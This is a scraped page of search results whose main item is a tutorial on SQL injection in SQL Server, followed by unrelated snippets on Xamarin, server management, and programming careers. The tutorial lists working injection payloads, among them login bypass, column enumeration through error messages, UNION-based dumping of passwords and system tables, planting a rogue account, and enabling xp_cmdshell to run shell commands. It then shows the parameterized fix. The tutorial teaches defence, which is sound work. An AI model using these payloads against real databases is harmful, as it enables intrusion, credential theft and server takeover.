Search Results

Search found 28280 results on 1132 pages for 'having clause'.

Page 74/1132 | < Previous Page | 70 71 72 73 74 75 76 77 78 79 80 81  | Next Page >

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • Xamarin Designer for Android Webinar - Recording

    - by Wallym
    Here is some info on the recording of the webinar that I did last week for AppDev regarding the Xamarin Designer for Android.Basic Info: Android user interfaces can be created declaratively by using XML files, or programmatically in code. The Xamarin Android Designer allows developers to create and modify declarative layouts visually, without having to deal with the tedium of hand-editing XML files. The designer also provides real-time feedback, which lets the developer validate changes without having to redeploy the application in order to test a design. This can speed up UI development in Android tremendously. In this webinar, we'll take a look at UI Design in Mono for Android, the basics of the Xamarin Android Designer, and build a simple application with the designer.Here is the link:http://media.appdev.com/EDGE/LL/livelearn05232012.wmvI think it will only play in Internet Explorer.  Enjoy!

    Read the article

  • Managing Multiple dedicated servers centrally using a Web GUI tools?

    - by Sampath
    Application Architecture I am having a single ruby on rails application code running with multiple instances (ie. each client having identical sub domains) running on a multiple dedicated server using phusion passenger + nginx. sub domains setup done using vhost option in nginx passenger module. For Example server 1 serving 1 - 100 client with identical sub domains www.client1.product.com upto www.client100.product.com server 2 serving 101 - 200 client with identical sub domains www.client101.product.com upto www.client200.product.com server 3 serving 201 - 300 client with identical sub domains www.client201.product.com upto www.client300.product.com What my question is i need to centrally manage all my N dedicated servers using an gui tool I am looking for Web GUI tool to manage tasks like 1) backup all mysql databases automatically from all dedicated servers and send it to an some FTP backup drive 2) back files and folders from all dedicated servers and send it to an some FTP backup drive 3) need to manage firewall (CSF http://configserver.com/cp/csf.html) centrally for all dedicated servers 4) look to see server load , bandwidth used in graphical manner for all N no of dedicated servers Note: I am prefer to looking for an open source solution

    Read the article

  • Do professional software developers still dream of creating industry/world-changing apps?

    - by Andrew Heath
    I'm a hobby programmer. The absence of real world deadlines, customer feedback, or performance reviews leaves me free to daydream about having and implementing The Next Great Idea That Changes the World. Of course I'm aware I probably have a better chance of winning the lottery, but it's fun to imagine knocking out some fully-homebrewed app that destroys the status quo. I know many professional programmers have side projects, some for profit others not. I was wondering on the way to work this morning (non-IT boring work) if having to code for your food tended to dampen the dreaming? Does greater experience leave you jaded and more focused on the projects at hand? Not trying to be a downer, just interested in the mindset of the real software professional :-)

    Read the article

  • How can I automatically change the system keyboard layout when plugging in an external keyboard?

    - by Andrew Bolster
    I have a US-Style laptop, which is fine, but I also have a UK-style Ergonomic USB keyboard. As such I usually have the US key layout set, but when I settle in at my desk and use the UK USB keyboard I find myself making stupid mistakes on symbols (normally a pretty good touch typist on either ergo or standard kbd). Can anyone think of a clean way of setting the keyboard layout based on the inferred layout/USBID of any plugged in Keyboard? Even having a custom setting such as adding a specific USB ID to a runtime script that checks if its plugged in or not. Can this be done without the user having to logout/in? I remember doing something similar with xorg.conf, but that required logout.

    Read the article

  • perl scripts stdin/pipe reading problem [closed]

    - by user4541
    I have 2 scripts for a task. The 1st outputs lines of data (terminated with RT/LF) to STDOUT now and then. The 2nd keeps reading data from STDIN for further processing in the following way: use strict; my $dataline; while(1) { $dtaline = ""; $dataline = ; until( $dataline ne "") { sleep(1); $dataline = ; } #further processing with a non-empty data line follows # } print "quitting...\n"; I redirect the output from the 1st to the 2nd using pipe as following: perl scrt1 |perl scpt2. But the problem I'm having with these 2 scpts is that it looks like that the 2nd scpt keeps getting the initial load of lines of data from the 1st scpt if there's no data anymore. Wonder if anybody having similar issues can kindly help a bit? Thanks.

    Read the article

  • How can I embed an existing podcast into my website?

    - by michaellindahl
    I manage a podcast and a website, currently they are separate but I would like to have a way to embed the podcast into the website, I still want to create/update the podcast separate from the website I just want visitors to be able to listen to the podcast on the website without having to open iTunes while still having the ability to choose what episode to play. The best solution I have found is: http://tools.wizzard.tv/ but I do not like it that much. Currently I have to log on and click refresh for it to recognize new episodes. I want to be able to update the podcast, and just like how iTunes will be updated I want the page on the website to be updated as well. The 'podcast' page will most likely not be like a blog but have a Flash or Java script application that will pull the info from the podcast.xml file to show the episodes.

    Read the article

  • links for 2010-03-16

    - by Bob Rhubart
    @oracle_ace: Anti-Standards "I am a non-absolutist. Never say never or always. Having a few choice 'thou shalt not's' in your standards is ok. Having mostly 'thou shalt not' is creating an anti-standard." -- Lewis "@oracle_ace" Cunningham (tags: oracle otn oracleace standards) Dana Singleterry: OTN Developer Days - Alberta March 18 / Atlanta April 1 ('s Weblog) Dana Singleterry's preview of upcoming OTN Developer Days. (tags: oracle otn events)

    Read the article

  • Why is there still so much offer for Perl programmers?

    - by user491444
    A quick search on monster.com on different scripting languages resulted on Perl having much more job opportunities than Python and Ruby (in Europe, I didn't check for the rest of the world), and since I'm just a newbie programmer I was wondering why is this? I've read everywhere that Python and Ruby are much better languages, and much more organized. Having coded in python and php myself, Perl's code seems so alien to me. Anyways, sorry for my poor English, it's my second language, and this is not a critique on the Perl language, I was just wondering whether it's a good idea to learn it at this point or not.

    Read the article

  • SUPINFO International University in Mauritius

    Since a while I'm considering to pick up my activities as a student and I'd like to get a degree in Computer Science. Personal motivation I mean after all this years as a professional software (and database) developer I have the personal urge to complete this part of my education. Having various certifications by Microsoft and being awarded as an Microsoft Most Valuable Professional (MVP) twice looks pretty awesome on a resume but having a "proper" degree would just complete my package. During the last couple of years I already got in touch with C-SAC (local business school with degree courses), the University of Mauritius and BCS, the Chartered Institute for IT to check the options to enroll as an experienced software developer. Quite frankly, it was kind of alienating to receive that feedback: Start from scratch! No seriously? Spending x amount of years to sit for courses that might be outdated and form part of your daily routine? Probably being in an awkward situation in which your professional expertise might exceed the lecturers knowledge? I don't know... but if that's path to walk... Well, then I might have to go for it. SUPINFO International University Some weeks ago I was contacted by the General Manager, Education Recruitment and Development of Medine Education Village, Yamal Matabudul, to have a chat on how the local IT scene, namely the Mauritius Software Craftsmanship Community (MSCC), could assist in their plans to promote their upcoming campus. Medine went into partnership with the French-based SUPINFO International University and Mauritius will be the 36th location world-wide for SUPINFO. Actually, the concept of SUPINFO is very likely to the common understanding of an apprenticeship in Germany. Not only does a student enroll into the programme but will also be placed into various internships as part of the curriculum. It's a big advantage in my opinion as the person stays in touch with the daily procedures and workflows in the real world of IT. Statements like "We just received a 'crash course' of information and learned new technology which is equivalent to 1.5 months of lectures at the university" wouldn't form part of the experience of such an education. Open Day at the Medine Education Village Last Saturday, Medine organised their Open Day and it was the official inauguration of the SUPINFO campus in Mauritius. It's now listed on their website, too - but be warned, the site is mainly in French language although the courses are all done in English. Not only was it a big opportunity to "hang out" on the campus of Medine but it was great to see the first professional partners for their internship programme, too. Oh, just for the records, IOS Indian Ocean Software Ltd. will also be among the future employers for SUPINFO students. More about that in an upcoming blog entry. Open Day at Medine Education Village - SUPINFO International University in Mauritius Mr Alick Mouriesse, President of SUPINFO, arrived the previous day and he gave all attendees a great overview of the roots of SUPINFO, the general development of the educational syllabus and their high emphasis on their partnerships with local IT companies in order to assist their students to get future jobs but also feel the heartbeat of technology live. Something which is completely missing in classic institutions of tertiary education in Computer Science. And since I was on tour with my children, as usual during weekends, he also talked about the outlook of having a SUPINFO campus in Mauritius. Apart from the close connection to IT companies and providing internships to students, SUPINFO clearly works on an international level. Meaning students of SUPINFO can move around the globe and can continue their studies seamlessly. For example, you might enroll for your first year in France, then continue to do 2nd and 3rd year in Canada or any other country with a SUPINFO campus to earn your bachelor degree, and then live and study in Mauritius for the next 2 years to achieve a Master degree. Having a chat with Dale Smith, Expand Technologies, after his interesting session on Technological Entrepreneurship - TechPreneur More questions by other craftsmen of the Mauritius Software Craftsmanship Community And of course, this concept works in any direction, giving Mauritian students a huge (!) opportunity to live, study and work abroad. And thanks to this, Medine already announced that there will be new facilities near Cascavelle to provide dormitories and other facilities to international students coming to our island. Awesome! Okay, but why SUPINFO? Well, coming back to my original statement - I'd like to get a degree in Computer Science - SUPINFO has a process called Validation of Acquired Experience (VAE) which is tailor-made for employees in the field of IT, and allows you to enroll in their course programme. I already got in touch with their online support chat but was only redirected to some FAQs on their website, unfortunately. So, during the Open Day I seized the opportunity to have an one-on-one conversation with Alick Mouriesse, and he clearly encouraged me to gather my certifications and working experience. SUPINFO does an individual evaluation prior to their assignment regarding course level, and hopefully my chances of getting some modules ahead of studies are looking better than compared to the other institutes. Don't get me wrong, I don't want to go down the easy route but why should someone sit for "Database 101" or "Principles of OOP" when applying and preaching database normalisation and practicing Clean Code Developer are like flesh and blood? Anyway, I'll be off to get my transcripts of certificates together with my course assignments from the old days at the university. Yes, I studied Applied Chemistry for a couple of years before intersecting into IT and software development particularly... ;-)

    Read the article

  • Swinging a sword in Xcode with Sprite Kit

    - by jking14
    I'm working on making an RPG in Xcode, and I'm having a major gameplay issue when it comes to having my character swing his sword in a way that is realistic and gameplay compatible. Right now, when the player taps the screen and the sword is in one of the player's hand, it rotates the upright sword 90 degrees. The sword which is a parent of the player floats in front of the player because of a collision issue I'm looking for any advice anyone can give on how to add a sword to the game and have it swing in a way that looks somewhat realistic and can damage enemies that are more than a single pixel away from the player

    Read the article

  • Best Free software for hosting user guides

    - by Hippyjim
    Hi All After having to clean up spam from a MediaWiki install for the umpteenth time, despite a recaptcha plugin "preventing" automated signups, I'm wondering if MediaWiki is the right choice as a CMS for hosting user manuals and guides. I've always loved the way wikis can let the guides be edited and commented on collaboratively, but I'm getting tired of dealing with automated vandals. I've disabled edits & signups for now, but as I'm having to go through the pain of cleaning thousands of junk pages, I'm beginning to think I should cut my losses and look for a better alternative. Does anyone know of suitable a FOSS application (preferably PHP / MySQL based) that would be simple for a non-coder (our manual writer) to edit, but that has all the interconnectivity, and searchability of a wiki? Or should I just bite the bullet again and lock the wiki down even further?

    Read the article

  • Cannot Unbind Super Key from Unity

    - by Tom Thorogood
    Due to a graphics card compatibility issue using CrunchBang, I was told that my best option would be to move to 12.04 LTS. I'm trying to get everything configured and personalized the way I'm used to things, but am having some issues with unbinding default Unity shortcuts. I'm used to having all my shortcuts routed through the super key (T for Terminal, W for Web, Up for increased opacity, and so on). I've followed instructions to install compizconfig-settings-manager, and did an advanced search for all keyboard shortcuts binding to the super key, including the Unity shortcuts, but Unity still seems to listen for that keypress, and thus neither compiz nor the keybindings set up in system prefs - keyboard receive the commands I give them. (I did try also to simply change the unity launcher key instead of disabling it as shown below -- neither worked)

    Read the article

  • PASS Summit 2013 - A Bunch of Blog Posts Recently

    - by RickHeiges
    Recently, there have been a number of blog posts about having the 2013 PASS Summit in Seattle or elsewhere. I had a post in November about the process and some of the major factors that were on my mind. You can read it here . There is value in moving the Summit to another venue. There is value in having the Summit in the same location/venue year after year as well. Many of the posts that I read recently make excellent arguments for each. As time goes on and you hear another good argument for one...(read more)

    Read the article

  • Can I use MSBuild to build old VS6 C++ projects?

    - by awe
    I have a build computer where Visual Studio not installed, only MSbuild which can build VS2008 projcets without having any Visual Studio installed. I wonder whether it is possible to use MSbuild with VC++ 6.0 project files, although I am thinking this could not be possible. In the past I have used it with a VS2008 solution file for C++, but not for building C++ 6.0 dsw file. For Vb6 we have an extension package for Msbuild (MSBuild.ExtensionPack.VisualStudio.VB6). Is anything similar available for C++ 6.0 projects? An alternative could be if there are lightweight build tools that can built VC6++ .dsw files without having to install Visual Studio 6.0 ?

    Read the article

  • HTML5 mobile game development vs. native game apps

    - by Vic Szpilman
    What is the current state of game engines, frameworks, libraries and conversions related to the HTML5 set of technologies (including CSS3 and JavaScript libraries such as RaphaelJS, Impact, gameQuery); and how does the best of that compare with developing a native app (especially for iOS and Android)? Especially in terms of performance, visuals and getting that "native feel". Thoughts on solutions such as Appcelerator and Corona SDK are also appreciated. In regards to Unity3D, is it possible to develop in it and still have the game be playable on a browser (such as current releases of Chrome or Firefox, at least) without any dependencies or having the user install anything (no unity web player). What I'm looking for is how to develop in web standards as to reach the maximum number of platforms (including outside mobile) while still retaining a native experience for mobile without having to implement the game anew for iOS and Android.

    Read the article

  • PASS Summit 2013 - A Bunch of Blog Posts Recently

    - by RickHeiges
    Recently, there have been a number of blog posts about having the 2013 PASS Summit in Seattle or elsewhere. I had a post in November about the process and some of the major factors that were on my mind. You can read it here . There is value in moving the Summit to another venue. There is value in having the Summit in the same location/venue year after year as well. Many of the posts that I read recently make excellent arguments for each. As time goes on and you hear another good argument for one...(read more)

    Read the article

  • Any good tutorials all this web programming stuff for a GUI person? [closed]

    - by supercheetah
    For some reason, I am having a hard time understanding all this web programming stuff--from AJAX to JSON, etc. I've got plenty of experience programming GUIs. I'm currently working on a project in Python, and I thought that maybe I could just use PyJS (since it's GWT for Python, it uses an API that's very familiar to experienced GUI programmers like myself) to compile it with a Javascript interface on top, but alas, the compiler gave me a spectacular failure. It's obviously not meant to handle much of any Python beyond itself, and some of the core Python library. It would have been nice if it could, but I will admit, it would have been the lazy way to do it. I tried to learn Django, but for some reason, I'm just having a hard time understanding the tutorial on their website, and what it's all doing. Maybe it's not the best framework to learn, perhaps? Anyway, does anyone have a good primer/tutorial explaining all this stuff, especially for Python, and especially for someone coming from a GUI background?

    Read the article

  • embedding LEFT OUTER JOIN within INNER JOIN

    - by user3424954
    I am having some problems with one of the question's answered in the book "SQL FOR MERE MORTALS". Here is the problem statement Here is the Database Structure Here is the answer which I am unable to comprehend Here is an answer which looks perfect to me Now the problem with the first answer I am having is: We first use LEFT OUTER JOIN for recipe class and recipes. So it selects all recipe class rows but only matching recipes. Perfecty fine as the question is demanding. Lets call this result set R. Now in the next step when we use INNER JOIN to join RecipieIngridients, it should filter out the rows from R in which Recipie ID doesn't match with the Recipe Id in Recipie Ingredients and hence filtering out the related Recipe class and recipe description also(Since it filters out the entire row of R). So this contradicts with the problem which demands all recipieID and RecipieDescription to be displayed from Recipe_Classes Table in this very step only. How can it be correct. Or Am i Missing some concept.

    Read the article

  • Displaying Tweets in an ASP.NET UserControl with TweetSharp

    As I mentioned in my previous blog post, I'll be having a little fun over the next few weeks talking about all of the Social Media APIs I've been experimenting with. I thought I would start out today by talking about one of the most popular services, Twitter. Twitter is essentially a microblogging service that allows its users to post messages of up to 140 characters long known as Tweets. Users can subscribe to each other and see tweets from all of their subscriptions in their main feed listings. Due to this ease of providing and receiving updates to and from the masses, Twitter has been adopted by anything from bloggers to celebrities to large corporations. If you have a blog or just a website in general, having a Twitter account alongside it could potentially be a useful way to attract new visitors. Displaying your tweets on your website and ...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Thoughts on Development using Virtual Machines

    - by J_A_X
    I'll be working as a development lead for a startup and I've suggested that we use VMs for development. I'm not talking about each developer having a desktop with VMs for testing/development, I mean having a server rack where all VMs are managed and have the developers work from a microPC (ChromeOS anyone?) locally, or even remotely from their home computer. To me, the benefits are the fact that it's extremely scalable, cheaper in the long run, easier to manage and that we utilize the hardware its maximum potential. As for cons, I can't think of any particular showstoppers other than we'll need someone to setup/maintain said setup. I was hoping that some of you might of had a similar setup at your place of employment and be able to weight in with your opinions. Thanks.

    Read the article

  • Limit the amount a camera can pitch

    - by ChocoMan
    I'm having problems trying to limit the range my camera can pitch. Currently my camera can pitch around a model without restriction, but having a hard time trying to find the value of the degree/radian the camera is currently at after pitching. Here is what I got so far: // Moves camera with thumbstick Pitch = pController.ThumbSticks.Right.Y * MathHelper.ToRadians(speedAngleMAX); // Pitch Camera around model public void cameraPitch(float pitch) { pitchAngle = ModelLoad.camTarget - ModelLoad.CameraPos; axisPitch = Vector3.Cross(Vector3.Up, pitchAngle); // pitch constrained to model's orientation axisPitch.Normalize(); ModelLoad.CameraPos = Vector3.Transform(ModelLoad.CameraPos - ModelLoad.camTarget, Matrix.CreateFromAxisAngle(axisPitch, pitch)) + ModelLoad.camTarget; } I've tried restraining the Y-camera position of ModelLoad.CameraPos.Y, but doing so gave me some unwanted results.

    Read the article

  • Collision filtering techniques

    - by Griffin
    I was wondering what efficient techniques are out there for mapping collision filtering between various bodies, sub-bodies, and so forth. I'm familiar with the simple idea of having different layers of 2D bodies, but this is not sufficient for more complex mapping: (Think of having sub-bodies of a body, such as limbs, collide with each other by placing them on the same layer, and then wanting to only have the legs collide with the ground while the arms would not) This can be solved with a multidimensional layer setup, but I would probably end up just creating more and more layers to the point where the simplicity and efficiency of layer filtering would be gone. Are there any more complex ways to solve even more complex situations than this?

    Read the article

< Previous Page | 70 71 72 73 74 75 76 77 78 79 80 81  | Next Page >